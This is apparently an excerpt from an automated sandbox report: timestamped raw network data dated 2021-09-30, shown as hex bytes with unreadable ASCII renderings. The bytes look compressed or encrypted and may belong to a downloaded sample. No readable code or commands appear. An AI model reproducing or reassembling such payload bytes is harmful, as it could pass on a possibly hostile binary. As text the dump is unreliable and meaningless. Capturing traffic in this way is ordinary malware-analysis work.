                                                                  2021-09-30 21:52:28 UTC1968INData Raw: 42 62 03 d5 39 3b cd c6 19 b9 e6 d3 86 81 13 09 4b 6c 11 f4 89 40 01 8e ce 85 45 13 c6 dc 13 ac 91 ca b8 42 6b 83 47 b4 0d 5b 8d 24 65 fb c1 c4 f0 1a 8c 09 a8 ae 25 71 98 0b 10 8f 47 36 3a b8 f8 a8 24 90 25 0a f3 c6 e4 ed bd 05 fa 1d 27 2b 7d 5c 3d 70 ec 29 40 9a 02 b6 aa 38 47 43 47 af b1 36 ec d8 a4 ca 39 a3 6a 3a d0 75 32 8c 15 44 9d 0d fb a9 fe ec 13 7d fb 40 63 f6 b4 dd dd b8 20 01 ee b1 7f e1 6a 91 ac 8d d8 e2 34 13 a5 16 b9 50 54 ee c5 8f 97 9d a5 27 5a 28 32 80 15 ac a6 40 76 33 34 fa 28 5c 11 e0 75 73 0b c8 3e d6 1b df 7d d0 bd be c3 63 1b b0 82 35 5b bc 9d 67 b5 78 3e f1 21 96 15 39 d9 d3 91 3d be 3b 99 ed 6c 3d 48 00 cf 21 0b 91 b1 11 45 95 bc 5d ca 4c b4 30 e4 b5 3e 78 2d 62 bf 48 fe e8 b2 de 54 5b be cd 25 d4 fb b2 47 ee 56 35 f6 26 15 30 10
                                                                  Data Ascii: Bb9;Kl@EBkG[$e%qG6:$%'+}\=p)@8GCG69j:u2D}@c j4PT'Z(2@v34(\us>}c5[gx>!9=;l=H!E]L0>x-bHT[%GV5&0
                                                                  2021-09-30 21:52:28 UTC1984INData Raw: fa af 4d 84 79 3f 97 48 85 f6 ea 90 38 a1 67 d1 3b 1c c3 e0 18 29 12 1d 53 ba 47 0a 43 38 2e 2e ec 60 0d 50 c0 b6 a7 76 10 b3 86 8d 10 e4 8c 56 b4 12 6b 33 09 97 21 1a ee b9 1b d0 3e cd c7 97 52 f7 f8 40 f8 e2 e2 ed d0 0c 25 6e 64 33 7a 5d 91 5f 5d e0 48 99 68 26 ac ef 7a 70 76 b5 6d 23 8f 6d 82 32 c0 0c 00 5c 73 c8 a2 91 eb 31 fe d0 b1 7a e7 46 ce 80 ef 7e 6f ee fe 26 30 3f 44 3f 73 68 80 49 db 87 4a 5c 60 3e 1f 84 98 20 8f 5e e0 75 04 a9 d2 03 2f 50 bf 88 3d 3d 04 5f 3f c2 77 d2 85 d6 65 c2 ef 1a a6 d6 bc 5d 0e fb 43 4a f1 cc d3 1b ec a8 17 08 11 b5 fd 79 dc a3 19 7a be 47 a2 58 ba 68 ec 59 83 9d c7 36 3a 7e 1d 97 aa e1 ec c9 f6 55 06 f4 79 c3 f7 d9 8f db e5 15 18 bc 8f c0 1b 63 01 ee 94 a1 6c d4 18 aa db 53 e0 f6 de 46 0b 65 6a 21 5b 74 6a 07 8c da fe
                                                                  Data Ascii: My?H8g;)SGC8..`PvVk3!>R@%nd3z]_]Hh&zpvm#m2\s1zF~o&0?D?shIJ\`> ^u/P==_?we]CJyzGXhY6:~UyclSFej![tj
                                                                  2021-09-30 21:52:28 UTC2000INData Raw: 68 93 36 12 72 10 c3 b3 a9 2d a3 86 c0 39 d2 53 1b b7 db 92 eb 1f c4 be ce 5c 3c 76 3d f4 95 d4 2c a0 f5 bd 51 3f 44 fe d6 b5 38 c7 97 2a 80 d8 ad fc f2 0b 2a d0 ab 5b 1a 5a 40 6e a4 c1 b9 5b 28 ab 94 2d 93 02 25 4d ec cf 6a 90 3b 1c ce cd 0c 54 39 81 f6 e1 6d 5a f4 2a bd 47 d7 d0 a9 bb 71 28 0d 6d c0 a9 04 f8 c7 b8 09 fc 1a 1b 00 51 50 39 d9 45 37 8a a8 96 6a aa 89 9d 96 b3 e7 b9 2b db eb a4 66 ea 5c 9f 59 5e 46 39 3f 7e 61 e4 fb 68 6c 00 ae 92 33 bb da 84 e8 d6 33 a9 3a d7 e7 a3 c4 bc 24 c2 56 a4 f7 5d 87 ca 89 06 aa 17 32 96 82 23 67 9a b3 af 83 b9 33 45 da 72 a6 b2 f1 b7 11 dc 17 88 fd 68 38 bb 75 be 33 4d 62 06 51 94 6a 58 95 5d 58 65 f5 88 9b 8e 05 53 99 e2 c7 b1 de e6 67 3f 67 ac 60 96 e9 ff b8 ae 89 4b 6f 16 fe d3 dd 45 db e9 b5 e4 45 e1 9c 28 17
                                                                  Data Ascii: h6r-9S\<v=,Q?D8**[Z@n[(-%Mj;T9mZ*Gq(mQP9E7j+f\Y^F9?~ahl33:$V]2#g3Erh8u3MbQjX]XeSg?g`KoEE(
                                                                  2021-09-30 21:52:28 UTC2016INData Raw: 70 7e fa 7e f2 fe a3 35 e2 87 f6 37 db e3 fa b0 69 4a 39 d4 8d 8b 98 fc 15 1e 7f 48 b0 f8 50 d1 50 2c 8d 6c 94 5d 34 9a 6e 33 ca bc 2c 21 8b e9 e1 d7 45 33 69 c1 a2 04 b1 86 39 09 92 69 94 df 69 d6 40 3d 95 9f 0c da 71 2b 71 15 0e fe c0 17 60 da 36 ca 7c 89 1d 01 cf f2 5b 24 31 89 d1 14 a8 44 c4 51 b0 82 26 a6 c7 5e c2 29 a6 05 ee 0b ba 9a 4e db f5 e4 46 c3 3b 77 fa eb 96 86 88 1e 58 0e 25 fa 32 7e df 36 9e 1c 6e ee 40 03 28 e9 99 cd 05 80 bf c3 14 e5 32 aa cd ce 5e 4a a4 1e 64 26 1e 6e 9c 41 24 d9 48 9f 0d 7f c6 36 31 b6 ea e2 05 54 e1 43 97 de 76 c1 38 e1 b9 3c d2 0e 66 97 d2 0e 48 24 7c 18 79 1f b1 4f 25 c6 ff b3 8f 62 50 9d ec 1b bc c9 0a fd 7e 91 e8 60 60 ac ff 52 e3 a7 80 3d a0 e5 ed 4a 55 71 34 32 e4 c1 49 97 ae d1 0b 58 8b ff c5 56 fc 0d 34 55 26
                                                                  Data Ascii: p~~57iJ9HPP,l]4n3,!E3i9ii@=q+q`6|[$1DQ&^)NF;wX%2~6n@(2^Jd&nA$H61TCv8<fH$|yO%bP~``R=JUq42IXV4U&
                                                                  2021-09-30 21:52:28 UTC2032INData Raw: 5a 91 3e 8a 9a e0 3d 0a 82 81 9d 18 e8 30 81 af 7b 81 5e c2 a9 bd 2d e6 cf 6d b9 8e 95 b3 60 5b 74 70 2e 4f 71 0d bc e7 6c 58 e2 f8 e4 5b 5f 23 29 32 51 e5 d9 e7 04 9a 65 72 bf 86 de 57 f6 40 82 17 03 ad c0 e8 51 c6 41 cc f7 6f 63 e3 b9 40 ad 18 e0 b8 09 0b 22 b5 c8 e8 7f af 22 4e 9c 1a 98 41 bb 8a db 3a 82 7e 51 c7 6d 33 bb ed d8 b9 08 32 c3 3e 7a a6 73 fa 5b 83 4f f0 b7 89 ce 8d bc 92 2d f2 18 51 3d 0d d2 91 a4 cb fa af 6d 99 85 30 5a e5 52 9b c7 45 bc 61 c6 9f 6b 89 cf ec 14 8c 35 d4 94 f0 9b ca c6 5e 63 73 77 4b 54 7a d0 c3 2e c2 0f 31 29 13 0e 4b 34 22 b5 0b 75 48 ee 46 de b9 24 40 dc 5e df 1e bd c9 84 cd a8 b0 2b 08 d5 24 47 0c 8c a5 a5 d3 1e 5c 1f 56 0c 08 f9 ae 25 9c 4a ac aa 1b c9 5e cc ff 41 94 12 83 7a 1e 0b b2 5b 06 a4 cd 3e 96 f9 9e f7 16 f5
                                                                  Data Ascii: Z>=0{^-m`[tp.OqlX[_#)2QerW@QAoc@""NA:~Qm32>zs[O-Q=m0ZREak5^cswKTz.1)K4"uHF$@^+$G\V%J^Az[>
                                                                  2021-09-30 21:52:28 UTC2048INData Raw: ae 3d e7 0f 15 4a 32 17 60 36 79 96 3c 1b 6d 62 4e fb b8 8e c1 75 d0 24 78 10 d5 a4 d5 47 0c 29 62 f8 7e a9 b9 60 69 85 fb 98 e7 ce e2 a1 4e 36 4f 1d 46 ac 64 3a e0 ad 88 cc 1c 1a cf 94 b6 82 a5 5e 73 7c 9f 67 f4 ab a6 9b 2e 3f 50 36 e9 e7 78 dd 31 d9 7f 80 30 7a cb a9 47 ba 42 ce 37 29 30 7b 54 d9 9b 5f ca b5 5f db 8a 15 e3 c3 9a dc cf 12 55 45 de 42 3f 4b 25 60 3a 59 68 a6 9f b5 8c d0 39 3c 52 6c dc 33 dc 01 5a fa c1 cf f2 97 84 54 a3 9b 19 e0 c9 89 29 f1 d2 74 14 24 4d d4 66 f9 9a e4 d3 5c 26 6e fc 1a be 93 43 0b 32 3e 8e 12 83 02 93 3b 6b 94 8a 04 ae 58 2c 5a dc 2f 46 55 a6 93 a4 fe d6 e9 99 2c 28 76 7b bd 07 52 1e d3 12 80 93 cb 52 66 1f 97 a6 4b e8 60 fb e4 bb a0 b2 c1 60 db b2 98 c0 e0 a3 44 a3 a2 7e a4 54 e9 f8 e1 7c bd fc 6b 11 0e db 89 2b ca f7
                                                                  Data Ascii: =J2`6y<mbNu$xG)b~`iN6OFd:^s|g.?P6x10zGB7)0{T__UEB?K%`:Yh9<Rl3ZT)t$Mf\&nC2>;kX,Z/FU,(v{RRfK``D~T|k+
                                                                  2021-09-30 21:52:28 UTC2064INData Raw: 00 af 60 0e ab 37 5e a0 4a 4d 57 19 c5 30 36 31 bf 59 db 0a b9 44 96 6a fd 59 42 b8 66 a9 1b ff 23 5c 75 54 35 ac ed 2e a2 bf 61 7d 94 2a bb dc f2 b1 6d 88 93 a3 1a 64 23 7b ac 96 a3 fc 43 63 76 61 fa aa 9b 1a 7c 0d 84 b4 52 d6 58 47 df 60 71 d8 fe 3c 49 7b 23 bd 21 ce d3 53 b8 e3 10 92 ca 9f db 6e 7b 60 6a d0 db 15 c1 61 33 e0 56 62 ff d8 86 cc 64 b2 c6 a4 62 ef 1c 02 d4 0e 4d a3 df 3c 32 dd 99 a9 f0 ac 85 74 ec 20 12 8d 52 55 37 72 a9 0c 99 e6 1f 41 cb 14 0a 48 30 f5 b9 fe 52 b9 30 a3 28 90 09 bc 72 db 29 3b 65 e1 97 79 82 58 1b 50 9e 88 7f 12 69 b5 b2 c1 79 8e 5f e8 ce 22 42 4b 92 0c 08 ed b1 94 0b 0a 5d c4 f5 36 9e c3 28 56 49 95 91 9e 2a 4b 4b e0 4f 19 31 31 a2 63 3d 09 77 21 92 68 5c 62 26 ec 96 f5 80 c8 6e ed 82 19 f8 c7 b1 53 71 03 9a 1c a4 37 b2
                                                                  Data Ascii: `7^JMW061YDjYBf#\uT5.a}*md#{Ccva|RXG`q<I{#!Sn{`ja3VbdbM<2t RU7rAH0R0(r);eyXPiy_"BK]6(VI*KKO11c=w!h\b&nSq7
                                                                  2021-09-30 21:52:28 UTC2080INData Raw: 97 0a 53 1e d4 05 1d d8 da 0f e5 23 95 88 5d 33 43 55 b0 1e f8 16 d6 3c f5 ce 9d 4f ef 68 47 5d 7b cd 88 ff 49 ab ff 12 43 6c 24 e5 d0 4e db f9 09 f9 ee 44 1c 47 19 36 a3 8c 90 58 57 8d 65 9f c9 18 fc 9f c0 ec 76 88 e8 50 74 3f 3b f9 65 75 a5 82 7f 2d 75 bb 2c 27 c5 ef a6 1c ae 5d d5 ae 9c 91 e2 ac de c0 d1 86 45 cc 4e f4 4c 03 24 0e 47 f4 67 ad 70 7a 8b 05 01 3c 83 de b3 17 c5 f1 cd 9c e9 21 84 8f 53 63 c0 66 6e 3e 96 f2 7c 43 5c dc a5 e9 f9 e2 07 7a c1 65 38 15 45 53 cf d6 24 29 4e c8 58 11 07 2c 7b f4 4c 0b 6c 63 ed 46 3a 2d ae 31 9b 31 7e 61 48 22 72 cd 04 10 a1 a3 4c ac 93 e3 89 fb db 1e b5 29 36 01 76 a9 5c 7b 53 e0 50 d3 46 8d a4 d1 31 db 23 15 8d 56 3e 55 cf f0 18 ee ae 0c 04 18 7d 9e f2 34 e1 a0 77 77 ff 72 fb db d7 ca fc d0 70 98 a0 f7 43 92 82
                                                                  Data Ascii: S#]3CU<OhG]{ICl$NDG6XWevPt?;eu-u,']ENL$Ggpz<!Scfn>|C\ze8ES$)NX,{LlcF:-11~aH"rL)6v\{SPF1#V>U}4wwrpC
                                                                  2021-09-30 21:52:28 UTC2096INData Raw: 3a 1f 9b 29 0e 2d 54 a2 b5 f7 98 30 58 a2 da 7c 9b 15 e5 ed 93 0d d3 9c 69 d5 cc 7f 6c dd f4 00 6f fa 0c 79 56 64 9e f7 09 a2 7b 6a b0 0e 25 ef 15 7e f6 b2 16 08 9b 02 fe 6e fb a1 65 00 ec e7 6c e1 8b 8b cd 05 43 9f ba 74 7f b3 f4 18 19 0e a4 4e 3c 72 eb eb bf c8 94 7e 68 ac 66 c1 e0 c0 2b f9 ff a1 60 19 3c 98 fd 16 ba fa 98 94 fa 6c bf 7b 87 1f 86 7d 24 3c 27 ca cd e2 a8 7b 1e e9 bb c2 94 d2 6b 5e f9 05 f7 3a 23 f2 c4 8a 08 04 62 df 86 20 44 81 3c 46 2e e7 75 8c f3 5b a9 1a 8f 7e b4 fe f5 7d 18 9f 67 01 48 1c 60 e0 b5 f6 1e af 72 e3 b0 6e 3e c6 96 82 89 de c3 20 61 f5 5a 06 af da 00 30 51 ed 8c 6f 03 0e a7 04 69 16 15 52 0b 06 07 dd 83 51 cb 7c d8 81 43 97 62 4f 10 b8 ba 7a 98 98 1a cf 3a 1e 7f d6 e7 0c c7 70 7f 6d 8b 8d cf 66 49 5b cd e8 e1 b8 9a ca 3c
                                                                  Data Ascii: :)-T0X|iloyVd{j%~nelCtN<r~hf+`<l{}$<'{k^:#b D<F.u[~}gH`rn> aZ0QoiRQ|CbOz:pmfI[<
                                                                  2021-09-30 21:52:28 UTC2112INData Raw: 19 d5 9c c6 08 72 b3 64 b0 a2 47 65 ec d8 56 66 dd e9 61 e9 3d d0 31 bf 1e 9c 6a c4 a1 20 27 3f 00 66 26 a2 06 4d 81 a9 4e f1 6f 33 ce db 56 89 32 c1 6d 95 5b 8b 82 92 3b 7b b5 04 cb 8f fd 4b 08 db 36 ae 53 de 78 a4 e1 82 52 94 19 84 88 13 63 a2 35 a7 af 92 4d 7b 5a 6d b7 83 3f eb ff e1 59 22 4e 63 a0 60 4d 04 eb a6 1d e5 84 05 78 ed 20 ff 29 f2 0c b5 cf 1e 74 f2 e1 a6 dc 46 76 25 1b cf de 7e 12 95 3d 07 1d 08 7f 27 3d 06 a7 89 cb 70 cb e5 62 18 cd c8 cf c0 8a 6c 0a 9a f0 68 38 b3 e8 0d 69 4e 1f b6 25 c4 93 71 42 7f 35 e2 06 95 5b 02 d3 5e 3e c2 ca c1 a4 0b c1 2a 7a f8 93 97 e1 4d 74 36 a3 4d ef 5e 50 cb 7e c1 6a 5f 97 bc 51 ca 35 a2 9f a2 35 3b 0b b2 cb c9 17 61 41 34 2d eb 19 41 29 55 d6 02 96 f2 3a 6a b3 23 f8 6f b0 b8 08 f4 5a a3 7d 87 ed 60 bb 4a 17
                                                                  Data Ascii: rdGeVfa=1j '?f&MNo3V2m[;{K6SxRc5M{Zm?Y"Nc`Mx )tFv%~='=pblh8iN%qB5[^>*zMt6M^P~j_Q55;aA4-A)U:j#oZ}`J
                                                                  2021-09-30 21:52:28 UTC2128INData Raw: 1b 3b 4a 41 00 50 3b 94 a7 63 8d a3 6a 2e 1a a7 e1 0d a7 ca e2 d5 9f 92 1b 91 c4 bd 02 5d 4b b8 83 4b da 7b df 48 eb 82 45 27 57 52 83 66 a2 d0 0f c1 a4 6a 99 a1 85 98 3b 66 fe cb 13 f2 a6 7d e4 81 e7 c1 d3 d3 55 b4 a3 1f 64 60 ab b9 6f e8 cd f8 15 11 22 64 6f 61 6e 5e 77 9c 4d 20 ed 52 c5 44 10 3e 6e 3a a1 ef 8c a7 4a 45 6d 3c 5e 7d cd f0 37 0f 25 7a f1 94 c0 9c b0 25 d6 c0 40 23 6a 2f 11 50 a8 c9 0c f4 a8 b6 c9 6e bf bb cf 00 33 0e b8 1d 1f c1 0f fc cb e6 29 26 cf b8 24 25 90 22 4e 4b 8c b5 58 ca 71 9e 23 98 17 a0 9e 2e 2c 2a d3 20 ac 3f ba 54 43 a2 f9 e0 56 f6 1f 0d 15 52 f0 9e 90 a9 3b ae 24 19 02 e7 83 94 83 85 a4 a8 5d 60 38 c8 1a 5b 41 e2 d7 28 69 07 ce f0 e0 30 41 51 f7 7d 22 7e 85 13 0e 14 ac ac 29 a4 6e c2 73 28 47 c6 67 a0 c8 71 ac 51 55 4f 55
                                                                  Data Ascii: ;JAP;cj.]KK{HE'WRfj;f}Ud`o"doan^wM RD>n:JEm<^}7%z%@#j/Pn3)&$%"NKXq#.,* ?TCVR;$]`8[A(i0AQ}"~)ns(GgqQUOU
                                                                  2021-09-30 21:52:28 UTC2144INData Raw: ea e4 2d 18 b4 95 6b 67 5d e7 86 92 3e 86 5c ce 33 91 28 fa de 7f fa 80 bc 3f be a2 3d ca cf c4 d0 74 b7 04 07 ad 08 fc 93 f9 19 93 2f ea 4e db 0e 5a be d3 ed 7f 27 c9 db 0e be 18 66 98 18 66 c6 b7 ae 40 bb 59 3c 9d b7 c0 73 1c 9a 3c 4f 94 f6 6d 06 2c bd f2 0a f3 48 2f c6 98 aa 2d b8 b9 f8 f6 19 86 79 d4 0d c9 23 86 06 35 86 32 6a 58 a2 c7 98 ae d2 bd c4 b9 18 f5 31 01 bc 29 a9 48 8b 0e 97 f6 ce ec f5 e9 68 e4 0b 5e d0 48 45 1d b3 b5 fd 04 5c e7 17 80 cb 65 00 cb cc 82 1b df fb 39 a4 4b 2c 54 cf e5 7a 05 23 99 1c 5a 40 e8 d8 9c 6f 93 4d 66 e8 95 b4 0f c5 57 bd ff 88 ee 93 80 93 9a a3 73 83 1a 95 0c 96 8d c8 89 f5 ab 8c 96 f2 d9 dc c5 ae 88 88 38 bd 19 e0 e0 cf 7d bf de 7e b5 04 f2 61 0f 82 cf 60 63 1d 75 bf 70 6c cc 69 ec 2e 12 bb b7 84 4e 9d 76 be e3 2e
                                                                  Data Ascii: -kg]>\3(?=t/NZ'ff@Y<s<Om,H/-y#52jX1)Hh^HE\e9K,Tz#Z@oMfWs8}~a`cupli.Nv.
                                                                  2021-09-30 21:52:28 UTC2160INData Raw: 42 e4 1d 2b 24 15 1b 9b 7c 16 78 8a ba 6f 4e 7d cc 5a d7 16 bc 33 df b2 a5 f6 9f c1 ab 80 f0 71 fa 3f 27 e9 56 d8 56 46 34 cb 39 99 fa 7c 04 fc 23 b1 5d 15 72 ed f3 19 5b 78 eb b3 ae c9 3b 5a 5e 3e 0e 40 75 5f de 17 d9 e9 50 a8 3d 81 c7 f5 60 3e 92 35 7d 97 38 0c 34 5c 01 b5 66 24 da bc 7c 70 d0 07 d5 c3 0c 9e e5 e3 42 8d bf f5 04 a3 c2 98 3a 93 69 90 91 37 d8 aa c0 6a f2 3f 6c 8d f2 b9 a5 ea 3c 09 6a 00 7a 62 cc 9b d1 cc f6 45 17 eb 65 b6 85 07 a3 bb 29 0e 79 5a b2 65 a3 e9 df 2c f6 12 6c b3 90 64 cd 14 69 61 5b 7e 96 79 6c 28 e0 10 f0 8f e2 0a d6 f5 7f 66 8e 17 67 8c d8 1f 6b 57 00 3f 8b 68 0c d5 8c df cc c1 ae 9e 87 48 a7 9a d1 d4 40 d2 9c 56 1e 9b 84 ba f2 54 a3 8d a4 ba d4 e6 3f e3 36 4e 61 ae d7 dc 5a 72 3f 8a ca 66 16 97 e9 cc 7c 94 ca 4d 7d d2 ff
                                                                  Data Ascii: B+$|xoN}Z3q?'VVF49|#]r[x;Z^>@u_P=`>5}84\f$|pB:i7j?l<jzbEe)yZe,ldia[~yl(fgkW?hH@VT?6NaZr?f|M}
                                                                  2021-09-30 21:52:28 UTC2176INData Raw: e7 08 73 d6 03 af 33 b1 e4 6b 81 13 c3 c0 d9 0f 64 01 25 37 5c 2b 23 d1 4f 16 d2 a4 94 6b 42 69 3c 4d 91 12 60 33 32 59 18 34 55 65 ed 92 69 6c ef 4f 04 57 5f 17 f1 c6 74 3e c4 08 7a 44 55 40 c7 8e d9 d1 8b a4 6b f2 e1 82 ba b7 08 99 35 22 da 30 40 6b 99 c6 b1 18 7c d7 bd 76 09 8c eb 4e ee 2c 92 ae d3 c9 a2 84 7e ce 09 04 0e ed ee f4 eb ff 37 ab 02 83 8d e0 ec c3 23 28 b9 c6 c3 dc 9d 2a 4a e8 a4 fd dc e4 46 6e bf fc 86 c5 75 7a f5 4e 74 f3 88 31 08 87 6d 16 62 c4 1e 08 42 74 1c 64 da b8 5d 53 b4 b4 93 87 c5 08 4a 2c ae 7f 22 cf 60 24 09 de f8 f4 53 bf 62 d4 64 b4 cf 5a 39 0d 99 d5 a1 87 e4 26 74 47 e7 ef 64 63 33 5a ed cc 69 1b f5 6b f3 a8 99 f0 41 b9 b2 dc a8 89 9c eb be 81 1b 8f 9e 44 e5 f9 df e1 56 38 19 d4 87 dd c2 73 1f af b1 ef 69 35 9e 4e 94 3d d1
                                                                  Data Ascii: s3kd%7\+#OkBi<M`32Y4UeilOW_t>zDU@k5"0@k|vN,~7#(*JFnuzNt1mbBtd]SJ,"`$SbdZ9&tGdc3ZikADV8si5N=
                                                                  2021-09-30 21:52:28 UTC2192INData Raw: 08 19 7a 12 38 ec e9 e6 07 56 a9 57 97 55 a3 3e 0a f7 0a f8 6a 30 63 78 1d 2d 8b 96 84 c8 77 4a 9b 88 24 4f e3 f0 6b 92 ad ff 72 51 bc 0f 50 58 bb 2d bd cd 0f 2f 84 90 e9 0f 66 5b 27 39 a5 fb 1d 13 26 57 05 bf c0 ec c2 bc fe 46 7b c0 2a d7 10 87 14 c0 d3 28 8f 79 0b bb b3 48 d6 8c 8f 9a 14 d9 cb 44 c7 f8 6a b5 e1 ad da ed 6c b2 c1 43 97 43 57 5b a1 71 c3 1a 0a f3 5f 0e b8 47 27 0f 23 b7 6a 8c ae a6 c0 d3 cc 89 6b b9 d1 e3 77 04 3d bf d7 41 c4 94 07 2a 99 eb fb 92 94 82 fe e4 18 53 5d ad b3 9b d4 60 a9 12 61 13 a4 63 0b 9f 1f 60 93 5e bb 3e 6a fc 46 ff cd 37 8c 4c 57 8d a0 d5 9f 57 49 96 7d 58 cf b9 65 55 53 fa 83 d8 3d 4d eb 7a 62 ec ab 34 2f 89 52 63 f9 02 17 8b 51 9e 37 d0 af ae c9 c1 92 39 c7 70 66 13 9e 72 d0 81 39 88 1e 75 76 36 d9 64 ca 04 f4 ec 10
                                                                  Data Ascii: z8VWU>j0cx-wJ$OkrQPX-/f['9&WF{*(yHDjlCCW[q_G'#jkw=A*S]`ac`^>jF7LWWI}XeUS=Mzb4/RcQ79pfr9uv6d
                                                                  2021-09-30 21:52:28 UTC2208INData Raw: d1 d7 88 2e b7 a4 99 8d 94 09 f1 68 a5 71 2f dc ac 1c c4 ca cb 5e 80 c2 e3 41 f4 75 ab 0a 06 37 5a 63 f5 32 0b f7 64 f3 94 35 a5 57 4e 3e ca 92 dc 0d 73 34 62 62 5a d8 a3 36 c7 43 f7 7b 09 de e2 6c 63 46 d5 5e 62 04 4f 61 02 02 81 bd a7 3e eb 65 2b 99 6f 16 b6 f7 2d 79 f3 d8 5d 49 d4 30 e4 c7 fa bd 52 ab a4 1a 28 0a 10 99 21 e0 b5 b2 3a e2 45 f2 88 f7 3d 91 af 5f 5c 0a 14 b6 3e d1 73 c2 a4 00 29 42 ca 8f df 55 32 39 b9 3a 8f db 45 54 9d 87 6f 6c 5a 2f f4 87 31 99 87 26 45 51 9e a8 8e c1 53 8d 4f bf 7e a7 c6 75 7a b9 17 c7 3c 14 b6 1e 3f 94 f4 64 d1 86 e3 7c 77 95 92 ac 66 7c 50 60 26 ce 87 8e 7f fa 73 be 69 7c 9a df b7 fb de 8c 1e c2 4a fd 09 ea 4d c2 ca e3 66 49 f2 8d 86 92 d0 2f db 3f f5 c9 18 a7 1c 9f ef 13 e8 05 01 c7 03 34 db f1 97 eb 76 85 17 24 c6
                                                                  Data Ascii: .hq/^Au7Zc2d5WN>s4bbZ6C{lcF^bOa>e+o-y]I0R(!:E=_\>s)BU29:ETolZ/1&EQSO~uz<?d|wf|P`&si|JMfI/?4v$
                                                                  2021-09-30 21:52:28 UTC2224INData Raw: af 1f 97 52 db 22 6f e3 4d 38 25 1f cc ea 76 8c 0e b5 4e b0 99 72 53 60 a0 9a f6 3e 43 3e 15 0a a6 28 ab 35 2c 04 9e c5 fb 07 c6 e2 d2 f8 84 00 c2 07 6a 14 ed 6e 46 c0 87 c1 96 4c 50 52 16 68 e0 86 02 d8 8c db 43 c7 b7 7b 8d 8f 72 ab ca 5c 72 d8 3f cc fe 1b 19 5d 2b d4 0a 3d 14 91 48 88 84 04 a6 96 f2 c0 18 d5 7a 6a e6 55 a9 47 05 e1 cb 64 8f 00 13 4d e3 1d 74 2a aa bd f1 db 49 92 75 f8 fd 16 81 65 9f 1e cb c8 32 28 65 b9 b1 72 7c 65 9f 5a 30 48 3d 99 78 fe fb f7 07 b7 cd 9f 33 ad f9 87 ab 9c b8 4d 3e 6d e3 75 df 96 90 fd ef 28 a5 eb 95 2f 9b 88 be ba 30 55 86 c5 15 97 05 8e 59 14 c5 2b 10 1b c8 03 07 3c 15 14 eb 12 0d a2 5e b9 10 99 35 d4 f2 c7 22 bd 02 7e 31 9d da 40 ca 45 90 5a 96 d0 f4 86 ce d2 93 ce 63 f1 3a 33 dc cf 6a 62 fc a5 0a 1d b0 42 3b 30 47
                                                                  Data Ascii: R"oM8%vNrS`>C>(5,jnFLPRhC{r\r?]+=HzjUGdMt*Iue2(er|eZ0H=x3M>mu(/0UY+<^5"~1@EZc:3jbB;0G
                                                                  2021-09-30 21:52:28 UTC2240INData Raw: 55 92 2d 73 23 1b 25 c5 6e cb b5 15 84 03 fe a7 7f 19 2d 85 3e 82 5a 25 84 9f 3d 7c 21 c2 c0 1d 6a 60 bf be 6f 29 24 10 66 64 dc de 80 f6 9f a5 8e 11 cc 1a 9f 58 11 e3 43 6c be 66 44 9a e3 37 12 1c 06 85 29 06 6f b1 be 05 37 72 61 f0 4f 7f 9d 01 91 03 45 52 30 1d 58 59 97 7e 53 c2 48 c9 47 c6 40 16 f5 e5 00 6c 7e 88 8f d7 62 64 c0 bb 26 66 9e c9 37 2e bc 75 1a e0 bb 23 e5 d8 e3 5b cb 0a de 4f 48 72 af 81 f0 77 57 d9 92 e0 72 6b 18 e3 c1 a9 09 5d bb e0 8a 3d 1a 8f 0c d7 3b d0 34 02 e9 7b ed 17 70 9b 4e cf 32 1c 39 52 59 9c 31 c5 fa 55 1f 61 65 01 f2 5e e0 85 68 d1 5d 63 45 18 59 72 33 bf de 96 93 db 74 8e d1 0d be da ed 69 47 c0 16 fd ec a1 f5 8a 15 39 4c c6 23 aa 1f 93 83 eb 34 36 d2 12 09 1d d4 e2 70 b1 cd b4 28 26 3d 52 76 0b 27 86 fe f1 66 aa c7 24 1a
                                                                  Data Ascii: U-s#%n->Z%=|!j`o)$fdXClfD7)o7raOER0XY~SHG@l~bd&f7.u#[OHrwWrk]=;4{pN29RY1Uae^h]cEYr3tiG9L#46p(&=Rv'f$
                                                                  2021-09-30 21:52:28 UTC2256INData Raw: db 0a 78 92 43 aa da d8 f4 a7 51 6f d7 f3 e5 89 20 c7 f3 79 90 64 b7 e0 aa 0b bc 53 cc 25 f7 4b 0a 52 43 69 e1 24 a8 b4 80 29 f5 3b 83 e8 f5 18 55 ab 34 a3 a9 74 03 de d3 6e cd 30 5d 5c f1 6e 8f 28 55 ad 92 e4 d2 cf bd 98 b4 9b 25 1b e3 c7 57 cb fb 2f bd 6f 5c f4 9f 97 e2 23 23 00 c7 13 b3 06 97 c3 a8 16 4e f5 c9 a0 23 15 ad c1 e2 6c fe fe e6 45 2f bc 27 04 30 e4 e3 43 70 34 19 c8 3d 24 bf 19 0b 8d 24 61 36 0b 36 fd ca 47 84 65 d1 41 b5 53 c4 59 d8 a1 ab 2b a1 0c 17 a6 50 d7 71 2d 52 d1 05 64 68 57 ec 49 36 68 81 c1 5d 2d f5 04 0c 05 99 47 1e 04 3c 87 1a 4f f8 19 f2 ee 08 b6 18 ef 47 f5 9a 61 79 45 d7 6e f3 84 02 d4 9f ee fb 65 32 d2 0e bd ce cd 7e ba e4 ee a5 98 9e fb 98 ed e5 eb 3a 0d c8 37 5f e3 7e 9f 19 6d 93 b8 13 92 c8 e3 54 e5 e7 f8 6f 33 76 2d 2d
                                                                  Data Ascii: xCQo ydS%KRCi$);U4tn0]\n(U%W/o\##N#lE/'0Cp4=$$a66GeASY+Pq-RdhWI6h]-G<OGayEne2~:7_~mTo3v--
                                                                  2021-09-30 21:52:28 UTC2272INData Raw: bc d6 8d 23 fe 0d 83 a8 c0 5f 53 bb 65 88 d7 62 66 f5 a9 8e 3d 5b 5b b3 20 a3 b4 df 98 ca 2e d5 a3 9f ef d1 33 3d 50 08 c4 e1 0f 16 68 cf 15 fd 0f e1 c2 82 2b 0a 14 b3 22 07 f3 53 7d 40 77 02 b0 c8 54 2b 28 f7 57 62 c9 11 a0 e3 ef 01 c4 2e b9 20 87 b9 c6 a8 cf 20 7e 34 75 98 9e 77 00 16 c8 28 af ea 49 8e 40 51 77 8b 32 ad ae 66 15 ff f7 19 74 8e 52 e4 e7 87 3a 7a fd 3a fe 16 b1 f4 9c eb e6 96 7f bf d5 d1 10 4a 3e ac b4 23 12 aa dc ee f3 7a 31 ea 7a e9 96 bb 06 8f 37 57 87 35 2f 88 16 63 c3 3c 82 f5 97 c9 0d f4 46 8c f5 89 8a 7d d9 2d e9 fa 4e f8 e0 23 3c 79 f6 d5 22 79 f6 00 40 37 ad d5 8c 11 1b 95 f4 06 52 7b f5 81 0b fa 15 6a 8c ca f9 fb 18 67 65 ea 7f 92 e6 4e a2 3b e1 be e3 52 c7 29 c6 51 e9 